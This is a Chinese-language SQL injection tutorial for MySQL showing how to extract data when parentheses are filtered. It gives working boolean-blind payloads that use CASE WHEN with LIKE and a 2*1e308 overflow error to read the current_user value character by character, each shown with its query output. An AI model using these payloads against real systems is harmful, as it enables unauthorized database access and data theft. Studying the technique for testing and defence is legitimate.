0x00 概要

不允许 “括号” 出现时的注入方法

0x01 测试数据

  1. mysql> select user();
  2. +----------------+
  3. | user()         |
  4. +----------------+
  5. | root@localhost |
  6. +----------------+
  7. 1 row in set (0.00 sec)
  1. mysql> select current_user;
  2. +----------------+
  3. | current_user   |
  4. +----------------+
  5. | root@localhost |
  6. +----------------+
  7. 1 row in set (0.00 sec)
  1. mysql> select * from tdb_goods where goods_id=1;
  2. +----------+----------------------------+------------+------------+-------------+---------+------------+
  3. | goods_id | goods_name                 | goods_cate | brand_name | goods_price | is_show | is_saleoff |
  4. +----------+----------------------------+------------+------------+-------------+---------+------------+
  5. |        1 | R510VC 15.6英寸笔记本       | 笔记本     | 华硕      |    3399.000 |       1 |          0 |
  6. +----------+----------------------------+------------+------------+-------------+---------+------------+
  7. 1 row in set (0.00 sec)

0x02 测试

  • 注意:
  • 如果使用了like又使用了延时会导致全表查询
  • 例如:
  • tdb_goods 表 数据为 23 条
  • 延时 0.1S
  • 0.1 * 23 = 2.3S 最后会延时2.3S 所以要尽量避免这样干
  1. // 正确的情况
  2. // 会返回原来的数据页面保持不变
  3. mysql> select * from tdb_goods where goods_id=1-case when 1 like 1 then 0 else 2*1e308 end;
  4. +----------+----------------------------+------------+------------+-------------+---------+------------+
  5. | goods_id | goods_name                 | goods_cate | brand_name | goods_price | is_show | is_saleoff |
  6. +----------+----------------------------+------------+------------+-------------+---------+------------+
  7. |        1 | R510VC 15.6英寸笔记本       | 笔记本     | 华硕      |    3399.000 |       1 |          0 |
  8. +----------+----------------------------+------------+------------+-------------+---------+------------+
  9. 1 row in set (0.00 sec)
  1. // 查询current_user数据正确的情况
  2. // 会返回原来的数据页面保持不变,说明 current_user 第一位为 “r”
  3. mysql> select * from tdb_goods where goods_id=1-case when current_user like 'r%' then 0 else 2*1e308 end;
  4. +----------+----------------------------+------------+------------+-------------+---------+------------+
  5. | goods_id | goods_name                 | goods_cate | brand_name | goods_price | is_show | is_saleoff |
  6. +----------+----------------------------+------------+------------+-------------+---------+------------+
  7. |        1 | R510VC 15.6英寸笔记本       | 笔记本     | 华硕      |    3399.000 |       1 |          0 |
  8. +----------+----------------------------+------------+------------+-------------+---------+------------+
  9. 1 row in set (0.00 sec)
  1. // 错误的情况
  2. // 页面会爆错,如果关闭了错误提示,页面的数据会为空
  3. mysql> select * from tdb_goods where goods_id=1-case when 1 like 2 then 0 else 2*1e308 end;
  4. ERROR 1690 - DOUBLE value is out of range in '(2 * 1e308)'